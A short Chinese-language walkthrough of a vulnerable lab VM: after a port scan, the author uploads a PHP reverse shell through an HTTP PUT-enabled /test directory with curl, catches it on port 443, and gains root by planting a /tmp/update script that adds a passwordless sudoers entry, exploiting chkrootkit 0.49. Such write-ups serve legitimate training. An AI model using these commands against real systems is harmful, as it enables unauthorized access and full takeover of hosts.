靶场搭建
下载虚拟机,导入到虚拟机,网卡调成NAT模式直接就能用
IP:192.168.174.130
渗透过程
信息初收集
22/tcp open ssh
80/tcp open http
明显是web,扫了一下路径,发现test外没有任何东西了,而且这个文件夹里啥都没有
发现可以使用PUT上传文件
于是上传反弹shell:curl --upload-file shell.php -v --url http://192.168.174.130/test/shell.php -0 --http1.0
目标机器可能设置了出口限制,反弹端口要设置为443才可以拿到shell!
监听,拿到shell。
提权
没有密码,低权限账号,目标机器一个john用户
find / -type f -perm /4000
没有发现有可以利用的脚本
查看定时任务,发现有一个chkrootkit
,查看版本信息dpkg -l | grep chkrootkit
有一个漏洞可以利用,Chkrootkit 0.49 - Local Privilege Escalation
具体漏洞信息:https://www.exploit-db.com/exploits/33899
echo 'echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update
这样等待一天后机器运行chkrootkit,就有了sudo权限,而且不需要密码,直接sudo su
就能拿到root权限了
小结
get了新的提权方式。
提权方式还有很多种,需要进行总结。